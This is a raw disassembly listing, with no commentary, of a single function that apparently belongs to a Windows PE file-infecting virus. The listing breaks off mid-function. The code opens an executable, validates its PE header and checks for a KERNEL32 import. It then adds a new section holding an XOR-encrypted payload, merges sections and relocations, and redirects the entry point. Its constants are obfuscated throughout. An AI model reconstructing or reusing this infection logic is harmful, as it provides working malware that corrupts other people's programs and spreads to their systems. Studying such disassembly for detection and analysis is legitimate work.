var_438 = dword ptr -438h
var_434 = dword ptr -434h
var_430 = dword ptr -430h
var_42C = dword ptr -42Ch
var_428 = dword ptr -428h
var_424 = dword ptr -424h
var_420 = dword ptr -420h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3200Ch
call sub_42507D
push ebx
push esi
push edi
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_31EC3]
push eax
call dword ptr ds:10010634h
add esp, 0Ch
push 0
mov eax, ds:100120ACh
sub eax, 2
push eax
push 3
push 0
mov eax, ds:1001210Ch
sub eax, 3
push eax
push 0C0000001h
push [ebp+arg_0]
call dword ptr ds:10011788h
mov [ebp+var_1070], eax
cmp eax, 0FFFFFFFFh
jnz short loc_422DCC
xor eax, eax
jmp loc_42416D
; ---------------------------------------------------------------------------
loc_422DCC: ; CODE XREF: sub_422D6E+55�j
push 0
push [ebp+var_1070]
call dword ptr ds:10011624h
mov [ebp+var_10], eax
mov edx, [ebp+arg_8]
lea eax, [eax+edx+1FFFFh]
push eax
push 0
call dword ptr ds:1000EA34h
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:1000C028h
mov eax, [ebp+var_4]
mov eax, [eax+3Ch]
mov [ebp+var_840], eax
mov eax, [ebp+var_31ED8]
sub eax, 0F8h
cmp [ebp+var_840], eax
ja loc_424156
mov eax, [ebp+var_840]
add eax, [ebp+var_4]
mov [ebp+var_8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jnz loc_424156
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+5Ch]
mov edx, ds:10012100h
add edx, ds:100120F8h
sub edx, 9
cmp eax, edx
jz loc_424156
mov eax, [ebp+var_8]
movzx edx, word ptr [eax+44h]
movsx ecx, word ptr ds:1001213Ch
add ecx, ds:100120F8h
dec ecx
cmp edx, ecx
jnz short loc_422E9D
mov edx, ds:10012144h
add edx, 5
add edx, ds:10012100h
mov [eax+1Ah], dl
cmp dl, 0
jnz loc_424156
loc_422E9D: ; CODE XREF: sub_422D6E+112�j
mov eax, [ebp+var_8]
mov eax, [eax+80h]
mov [ebp+var_430], eax
mov eax, 28h
mov [ebp+var_31EE8], eax
mov edx, [ebp+var_8]
mov [ebp+var_31EF0], edx
mov ecx, [ebp+var_840]
add ecx, 0F8h
mov [ebp+var_31EEC], eax
movzx edi, word ptr [edx+6]
mul edi
mov [ebp+var_31EF4], eax
mov edx, ecx
add edx, eax
mov [ebp+var_31EFC], edx
mov eax, [ebp+var_31EE8]
mov [ebp+var_31EF8], eax
mov ecx, ds:10012124h
add ecx, 2
mul ecx
mov [ebp+var_31F00], eax
mov eax, [ebp+var_31EFC]
mov edx, [ebp+var_31F00]
add eax, edx
mov edx, [ebp+var_31EF0]
add eax, [edx+0D4h]
cmp eax, [edx+54h]
ja loc_424156
mov eax, ds:10012100h
add eax, ds:100120ACh
sub eax, 5
mov [ebp+var_20], eax
mov eax, ds:1001209Ch
sub eax, 3
mov [ebp+var_C54], eax
movsx eax, word ptr ds:1001212Ch
movsx edx, word ptr ds:1001211Ch
add eax, edx
sub eax, 6
mov [ebp+var_105C], eax
movsx eax, word ptr ds:10012140h
movsx edx, word ptr ds:100120B8h
add eax, edx
sub eax, 9
mov [ebp+var_434], eax
jmp loc_423040
; ---------------------------------------------------------------------------
loc_422F7E: ; CODE XREF: sub_422D6E+2DF�j
mov eax, 28h
mul [ebp+var_434]
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F0C]
mov esi, edx
add esi, eax
mov eax, [esi+0Ch]
add eax, [esi+8]
mov [ebp+var_31F04], eax
mov eax, [esi+14h]
add eax, [esi+10h]
mov [ebp+var_31F08], eax
mov eax, [ebp+var_20]
cmp [ebp+var_31F04], eax
jbe short loc_422FD5
mov eax, [ebp+var_31F04]
mov [ebp+var_20], eax
loc_422FD5: ; CODE XREF: sub_422D6E+25C�j
mov eax, [ebp+var_C54]
cmp [ebp+var_31F08], eax
jbe short loc_422FEF
mov eax, [ebp+var_31F08]
mov [ebp+var_C54], eax
loc_422FEF: ; CODE XREF: sub_422D6E+273�j
mov eax, [ebp+var_8]
mov eax, [eax+0A8h]
cmp eax, [esi+0Ch]
jb short loc_42301A
cmp eax, [ebp+var_31F04]
jnb short loc_42301A
mov eax, [esi+14h]
mov edx, [ebp+var_8]
add eax, [edx+0A8h]
sub eax, [esi+0Ch]
mov [ebp+var_105C], eax
loc_42301A: ; CODE XREF: sub_422D6E+28D�j
; sub_422D6E+295�j
mov eax, [ebp+var_430]
mov edx, [esi+0Ch]
cmp eax, edx
jb short loc_42303A
add edx, [esi+8]
cmp eax, edx
jnb short loc_42303A
sub eax, [esi+0Ch]
add eax, [esi+14h]
mov [ebp+var_848], eax
loc_42303A: ; CODE XREF: sub_422D6E+2B7�j
; sub_422D6E+2BE�j
inc [ebp+var_434]
loc_423040: ; CODE XREF: sub_422D6E+20B�j
mov eax, [ebp+var_8]
movzx eax, word ptr [eax+6]
cmp [ebp+var_434], eax
jb loc_422F7E
movsx eax, word ptr ds:10012114h
mov edx, ds:10012144h
lea eax, [eax+edx+0FFDh]
push eax
push [ebp+var_20]
call sub_41B84B
add esp, 8
mov [ebp+var_20], eax
mov eax, [ebp+var_C54]
cmp [ebp+var_10], eax
jz short loc_4230A0
mov eax, [ebp+var_8]
movsx edx, word ptr ds:100120B4h
add edx, ds:10012134h
sub edx, 9
cmp [eax+0A8h], edx
jz loc_424156
loc_4230A0: ; CODE XREF: sub_422D6E+311�j
mov eax, ds:100120F8h
sub eax, 7
cmp [ebp+var_105C], eax
jz loc_423181
movsx eax, word ptr ds:10012120h
sub eax, 8
mov [ebp+var_31F0C], eax
mov eax, ds:1001210Ch
add eax, ds:1001209Ch
sub eax, 6
mov [ebp+var_31F04], eax
jmp short loc_423128
; ---------------------------------------------------------------------------
loc_4230DA: ; CODE XREF: sub_422D6E+3E0�j
mov eax, [ebp+var_105C]
mov [ebp+var_31F10], eax
mov eax, 1Ch
mul [ebp+var_31F04]
mov [ebp+var_31F14], eax
mov eax, [ebp+var_31F10]
mov edx, [ebp+var_31F14]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F08], eax
mov edx, [ebp+var_31F0C]
cmp [eax+18h], edx
jbe short loc_423122
mov eax, [eax+18h]
mov [ebp+var_31F0C], eax
loc_423122: ; CODE XREF: sub_422D6E+3A9�j
inc [ebp+var_31F04]
loc_423128: ; CODE XREF: sub_422D6E+36A�j
mov edi, [ebp+var_8]
mov eax, [edi+0ACh]
mov ecx, 1Ch
shr eax, 2
mov edx, 24924925h
mul edx
mov [ebp+var_31F10], edx
mov edi, edx
cmp [ebp+var_31F04], edi
jb short loc_4230DA
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_31F0C]
call sub_41B84B
add esp, 8
mov [ebp+var_31F0C], eax
mov eax, [ebp+var_C54]
cmp eax, [ebp+var_10]
jz short loc_423181
cmp [ebp+var_31F0C], eax
jnz loc_424156
loc_423181: ; CODE XREF: sub_422D6E+340�j
; sub_422D6E+405�j
and [ebp+var_1174], 0
mov eax, ds:100120E8h
movsx edx, word ptr ds:10012114h
add eax, edx
sub eax, 9
mov [ebp+var_438], eax
jmp loc_4232E1
; ---------------------------------------------------------------------------
loc_4231A4: ; CODE XREF: sub_422D6E+582�j
mov eax, [ebp+var_848]
add eax, [ebp+var_438]
add eax, [ebp+var_4]
mov [ebp+var_32008], eax
movsx edx, word ptr ds:10012120h
sub edx, 8
cmp [eax], edx
jz loc_4232F6
mov eax, [ebp+var_32008]
mov eax, [eax+0Ch]
sub eax, [ebp+var_430]
add eax, [ebp+var_848]
mov [ebp+var_3200C], eax
add eax, [ebp+var_4]
push eax
lea eax, [ebp+var_32003]
push eax
call dword ptr ds:1000E1F4h
add esp, 8
mov eax, ds:10012138h
add eax, ds:100120F8h
sub eax, 9
mov [ebp+var_31F04], eax
jmp short loc_42323B
; ---------------------------------------------------------------------------
loc_423210: ; CODE XREF: sub_422D6E+4EF�j
mov eax, [ebp+var_31F04]
mov al, [ebp+eax+var_32003]
cmp al, 61h
jle short loc_423235
cmp al, 7Ah
jge short loc_423235
mov eax, [ebp+var_31F04]
lea eax, [ebp+eax+var_32003]
sub byte ptr [eax], 20h
loc_423235: ; CODE XREF: sub_422D6E+4B1�j
; sub_422D6E+4B5�j
inc [ebp+var_31F04]
loc_42323B: ; CODE XREF: sub_422D6E+4A0�j
mov eax, [ebp+var_31F04]
movsx eax, [ebp+eax+var_32003]
mov edx, ds:10012148h
movsx ecx, word ptr ds:1001214Ch
add edx, ecx
sub edx, 6
cmp eax, edx
jnz short loc_423210
mov eax, ds:10012144h
movsx edx, word ptr ds:1001213Ch
add edx, eax
cmp byte ptr [ebp+edx+var_3200C+2], 4Bh
jnz short loc_4232DA
mov edx, ds:100120D0h
cmp [ebp+edx+var_32002], 45h
jnz short loc_4232DA
mov edx, ds:100120E8h
add edx, eax
cmp byte ptr [ebp+edx+var_32008+1], 52h
jnz short loc_4232DA
movsx eax, word ptr ds:100120F4h
cmp [ebp+eax+var_31FFE], 4Ch
jnz short loc_4232DA
movsx eax, word ptr ds:10012140h
add eax, ds:100120D8h
cmp byte ptr [ebp+eax+var_32008+1], 33h
jnz short loc_4232DA
mov eax, ds:10012098h
cmp [ebp+eax+var_32001], 32h
jnz short loc_4232DA
mov [ebp+var_1174], 1
loc_4232DA: ; CODE XREF: sub_422D6E+507�j
; sub_422D6E+517�j ...
add [ebp+var_438], 14h
loc_4232E1: ; CODE XREF: sub_422D6E+431�j
mov eax, [ebp+var_8]
mov eax, [eax+84h]
cmp [ebp+var_438], eax
jb loc_4231A4
loc_4232F6: ; CODE XREF: sub_422D6E+457�j
cmp [ebp+var_1174], 0
jz loc_424156
lea eax, [ebp+var_31EC3]
mov [ebp+var_42C], eax
mov ecx, [eax+3Ch]
mov [ebp+var_84C], ecx
add ecx, eax
mov [ebp+var_844], ecx
mov eax, [ebp+var_8]
mov [ebp+var_31F04], eax
mov edx, ds:10012100h
sub edx, 3
cmp [eax+0D0h], edx
jz loc_4234AA
mov edx, [eax+0D4h]
mov [ebp+var_31F08], edx
movsx ecx, word ptr ds:100120F4h
cmp edx, ecx
jz loc_4234AA
mov ecx, 28h
mov edi, [ebp+var_840]
add edi, 0F8h
mov eax, ecx
mov edx, [ebp+var_31F04]
movzx edx, word ptr [edx+6]
mov [ebp+var_31F0C], edx
mul edx
mov [ebp+var_31F10], eax
mov edx, edi
add edx, eax
mov [ebp+var_31F18], edx
mov eax, ecx
mov [ebp+var_31F14], eax
mov ecx, ds:10012104h
add ecx, 2
mul ecx
mov [ebp+var_31F1C], eax
mov eax, [ebp+var_31F18]
mov edx, [ebp+var_31F1C]
add eax, edx
mov edx, [ebp+var_31F08]
add eax, edx
mov edx, [ebp+var_31F04]
cmp [edx+54h], eax
jbe loc_4234AA
mov eax, [ebp+var_840]
add eax, 0F8h
mov [ebp+var_31F28], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F2C], eax
mov eax, [ebp+var_31F28]
mov edx, [ebp+var_31F2C]
add eax, edx
mov [ebp+var_31F20], eax
mov [ebp+var_31F30], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
mov edi, ds:1001210Ch
dec edi
sub ecx, edi
mul ecx
mov [ebp+var_31F34], eax
mov eax, [ebp+var_31F30]
mov edx, [ebp+var_31F34]
add eax, edx
mov [ebp+var_31F24], eax
mov eax, [ebp+var_8]
push dword ptr [eax+0D4h]
mov eax, [ebp+var_4]
mov edx, [ebp+var_31F20]
add edx, eax
push edx
mov edx, [ebp+var_31F24]
add edx, eax
push edx
call dword ptr ds:10010634h
add esp, 0Ch
mov eax, [ebp+var_8]
add eax, 0D0h
mov [ebp+var_31F38], eax
mov eax, 28h
mov ecx, [ebp+var_844]
movzx ecx, word ptr [ecx+6]
movsx edi, word ptr ds:10012090h
add edi, ds:10012128h
sub ecx, edi
mul ecx
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_31F38]
mov edx, eax
mov ecx, [ebp+var_31F3C]
add [edx], ecx
loc_4234AA: ; CODE XREF: sub_422D6E+5CA�j
; sub_422D6E+5E5�j ...
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41B84B
mov [ebp+var_10], eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F20], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F20]
mov esi, edx
add esi, eax
push 10012701h
call sub_41E33D
push eax
push esi
call dword ptr ds:1000E1F4h
mov eax, ds:10012098h
add eax, 1FFFBh
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+arg_8]
add eax, 0Dh
push eax
call sub_41B84B
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
movsx eax, word ptr ds:10012140h
lea eax, [eax+eax-3FFFFFCEh]
mov [esi+24h], eax
movsx eax, word ptr ds:1001214Ch
add eax, 8
push eax
mov eax, ds:10012148h
sub eax, 2
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10010640h
mov eax, [ebp+var_20]
mov [ebp+var_1060], eax
mov eax, [ebp+var_10]
mov [ebp+var_850], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
mov eax, [ebp+var_10]
add eax, [esi+10h]
push eax
call sub_41B84B
add esp, 30h
mov [ebp+var_10], eax
mov eax, ds:1001210Ch
add eax, 1FFF8h
movsx edx, word ptr ds:100120F0h
add eax, edx
add [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call dword ptr ds:10011BACh
movsx edi, word ptr ds:1001214Ch
sub edi, 3
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
movsx eax, word ptr ds:100120E4h
add eax, ds:10012094h
sub eax, 6
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
mov edi, ds:100120BCh
movsx edx, word ptr ds:10012118h
add edi, edx
sub edi, 9
mov edx, [ebp+var_42C]
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call dword ptr ds:10011BACh
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F28], edx
mov [ebp+var_31F24], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F28]
mov [ecx+edi], dl
call dword ptr ds:10011BACh
movsx edx, word ptr ds:100120B8h
dec edx
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F30], edx
mov [ebp+var_31F2C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F30]
mov [ecx+edi], dl
mov eax, ds:1001210Ch
add eax, 3Dh
add eax, ds:100120D4h
mov [ebp+var_43C], eax
jmp short loc_4236BB
; ---------------------------------------------------------------------------
loc_423686: ; CODE XREF: sub_422D6E+959�j
call dword ptr ds:10011BACh
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F38], edx
mov [ebp+var_31F34], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F38]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_4236BB: ; CODE XREF: sub_422D6E+916�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_423686
push 0Dh
push 10012180h
lea eax, [ebp+var_31ED0]
push eax
call dword ptr ds:10010634h
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED0]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10010634h
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
mov edx, ds:10012144h
add edx, 2
add eax, edx
mov [ebp+var_424], eax
jmp short loc_423734
; ---------------------------------------------------------------------------
loc_42371A: ; CODE XREF: sub_422D6E+9D5�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_423734: ; CODE XREF: sub_422D6E+9AA�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_42371A
movsx eax, word ptr ds:1001212Ch
sub eax, 4
mov [ebp+var_18], eax
movsx eax, word ptr ds:100120CCh
add eax, ds:100120BCh
sub eax, 8
mov [ebp+var_440], eax
jmp loc_4239BE
; ---------------------------------------------------------------------------
loc_42376D: ; CODE XREF: sub_422D6E+C60�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F40]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov esi, edx
add esi, eax
movsx eax, word ptr ds:10012120h
sub eax, 8
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_423814
movsx eax, word ptr ds:100120F0h
movsx edx, word ptr ds:10012090h
add eax, edx
sub eax, 6
cmp byte ptr [ebx+eax], 72h
jnz short loc_423814
mov eax, ds:100120DCh
add eax, ds:100120F8h
sub eax, 0Ah
cmp byte ptr [ebx+eax], 63h
jnz short loc_423814
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_4239B8
; ---------------------------------------------------------------------------
loc_423814: ; CODE XREF: sub_422D6E+A69�j
; sub_422D6E+A82�j ...
mov eax, ds:100120D8h
mov edx, eax
add edx, ds:100120FCh
sub edx, 6
cmp byte ptr [ebx+edx], 2Eh
jnz short loc_423860
movsx edx, word ptr ds:100120B8h
add eax, edx
sub eax, 4
cmp byte ptr [ebx+eax], 65h
jnz short loc_423860
movsx eax, word ptr ds:100120A4h
cmp byte ptr [ebx+eax], 61h
jnz short loc_423860
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1180], eax
jmp loc_4239B8
; ---------------------------------------------------------------------------
loc_423860: ; CODE XREF: sub_422D6E+ABA�j
; sub_422D6E+ACC�j ...
movsx eax, word ptr ds:100120B4h
add eax, ds:100120D0h
sub eax, 5
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_42389F
mov eax, ds:10012104h
movsx edx, word ptr ds:10012130h
add eax, edx
sub eax, 5
cmp byte ptr [ebx+eax], 69h
jnz short loc_42389F
mov eax, ds:1001209Ch
add eax, 2
cmp byte ptr [ebx+eax], 61h
jz loc_4239B8
loc_42389F: ; CODE XREF: sub_422D6E+B06�j
; sub_422D6E+B1D�j
push ebx
push esi
call dword ptr ds:1000E1F4h
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, ds:100120B0h
add eax, 7
push eax
movsx eax, word ptr ds:10012114h
sub eax, 3
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10010640h
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41B84B
add esp, 1Ch
mov [ebp+var_10], eax
movsx eax, word ptr ds:1001214Ch
add eax, ds:10012104h
sub eax, 5
cmp byte ptr [ebx+eax], 64h
jnz short loc_42396C
mov eax, [ebp+var_31F3C]
cmp [ebp+var_10], eax
jbe short loc_42396C
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F48], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_42396C: ; CODE XREF: sub_422D6E+BDC�j
; sub_422D6E+BE7�j
mov eax, ds:100120A8h
add eax, 0FFCh
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_41B84B
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10010634h
add esp, 14h
loc_4239B8: ; CODE XREF: sub_422D6E+AA1�j
; sub_422D6E+AED�j ...
inc [ebp+var_440]
loc_4239BE: ; CODE XREF: sub_422D6E+9FA�j
mov eax, [ebp+var_844]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_42376D
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_4239E3: ; CODE XREF: sub_422D6E+EA7�j
movsx eax, word ptr ds:10012114h
add eax, ds:10012098h
sub eax, 8
mov [ebp+var_1C], eax
jmp short loc_423A54
; ---------------------------------------------------------------------------
loc_4239F8: ; CODE XREF: sub_422D6E+CEC�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_423A14
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_423A14: ; CODE XREF: sub_422D6E+C99�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_423A51
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_423A5C
; ---------------------------------------------------------------------------
loc_423A51: ; CODE XREF: sub_422D6E+CBF�j
inc [ebp+var_1C]
loc_423A54: ; CODE XREF: sub_422D6E+C88�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_4239F8
loc_423A5C: ; CODE XREF: sub_422D6E+CE1�j
mov eax, ds:10012110h
movsx edx, word ptr ds:100120F4h
add eax, edx
sub eax, 8
mov [ebp+var_428], eax
jmp loc_423BDB
; ---------------------------------------------------------------------------
loc_423A78: ; CODE XREF: sub_422D6E+E79�j
mov eax, [ebp+var_428]
movsx edx, word ptr ds:10012130h
add edx, ds:100120F8h
sub edx, 3
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F40], eax
mov ax, [eax]
mov word ptr [ebp+var_31F3C], ax
movzx eax, word ptr [ebp+var_31F3C]
mov edx, ds:100120C4h
sub edx, 4
cmp eax, edx
jz loc_423BED
movzx edi, word ptr [ebp+var_31F3C]
movsx edx, word ptr ds:100120CCh
mov ecx, edx
add ecx, 5
sar edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx edi, word ptr [ebp+var_31F3C]
mov ecx, ds:10012100h
inc ecx
shl edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx edi, word ptr [ebp+var_31F3C+2]
movsx edx, word ptr ds:10012114h
mov ecx, edx
inc ecx
sar edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx eax, word ptr [ebp+var_31F3C+2]
mov edx, ds:1001210Ch
add edx, ds:10012138h
sub edx, 5
cmp eax, edx
jnz short loc_423B38
movsx eax, word ptr ds:100120B8h
sub eax, 2
cmp [ebp+var_428], eax
jnz loc_423BED
loc_423B38: ; CODE XREF: sub_422D6E+DB2�j
mov eax, [ebp+var_844]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F4C], eax
sub eax, [ebp+var_31F48]
mov [ebp+var_31F50], eax
movzx eax, word ptr [ebp+var_31F44+2]
movsx edx, word ptr ds:100120B4h
sub edx, 2
cmp eax, edx
jnz short loc_423BC7
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F54], eax
mov edx, [ebp+var_31F50]
add [eax], edx
loc_423BC7: ; CODE XREF: sub_422D6E+E2C�j
mov eax, ds:10012098h
add eax, ds:10012128h
sub eax, 3
add [ebp+var_428], eax
loc_423BDB: ; CODE XREF: sub_422D6E+D05�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_423A78
loc_423BED: ; CODE XREF: sub_422D6E+D47�j
; sub_422D6E+DC4�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_844]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_4239E3
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1184], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
add eax, 60h
mov edx, [ebp+var_844]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_844]
mov edx, [edx+68h]
add [eax], edx
mov eax, [ebp+var_8]
mov edx, ds:10012098h
add edx, 8
mov [eax+44h], dx
mov edx, ds:10012104h
add edx, 6
mov [eax+1Ah], dl
movsx edx, word ptr ds:100120CCh
sub edx, 6
mov [eax+46h], dx
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EDC], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EDC]
add eax, [edx+1Ch]
sub eax, [ebp+var_1180]
mov [ebp+var_31EE0], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE4], eax
mov eax, [eax]
mov [ebp+var_1058], eax
mov eax, ds:100120E8h
sub eax, 6
mov [ebp+var_24], eax
jmp short loc_423D08
; ---------------------------------------------------------------------------
loc_423CC7: ; CODE XREF: sub_422D6E+FA0�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_423D05
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_1188], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1190], edi
jmp short loc_423D10
; ---------------------------------------------------------------------------
loc_423D05: ; CODE XREF: sub_422D6E+F73�j
inc [ebp+var_24]
loc_423D08: ; CODE XREF: sub_422D6E+F57�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_423CC7
loc_423D10: ; CODE XREF: sub_422D6E+F95�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1190]
add eax, [ebp+var_1058]
sub eax, [ebp+var_1188]
mov [ebp+var_118C], eax
mov eax, [ebp+var_844]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_42403D
; ---------------------------------------------------------------------------
loc_423D51: ; CODE XREF: sub_422D6E+12DB�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F3C], edx
movsx ecx, word ptr ds:100120E4h
mov [ebp+var_31F44], ecx
movzx edi, byte ptr [edx+eax]
mov edx, ds:10012104h
add edx, 0E1h
add edx, ecx
cmp edi, edx
jnz loc_423ED5
mov edx, ds:10012124h
mov [ebp+var_31F40], edx
movsx edi, word ptr ds:1001211Ch
add edi, edx
sub edi, 3
mov edx, eax
add edx, edi
mov edi, [ebp+var_31F3C]
movzx edx, byte ptr [edi+edx]
movsx edi, word ptr ds:1001213Ch
movsx ecx, word ptr ds:10012118h
add edi, ecx
mov ecx, edi
sub ecx, 10h
cmp edx, ecx
jnz loc_423ED5
mov edx, ds:10012094h
add edx, ds:100120C0h
dec edx
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+ecx]
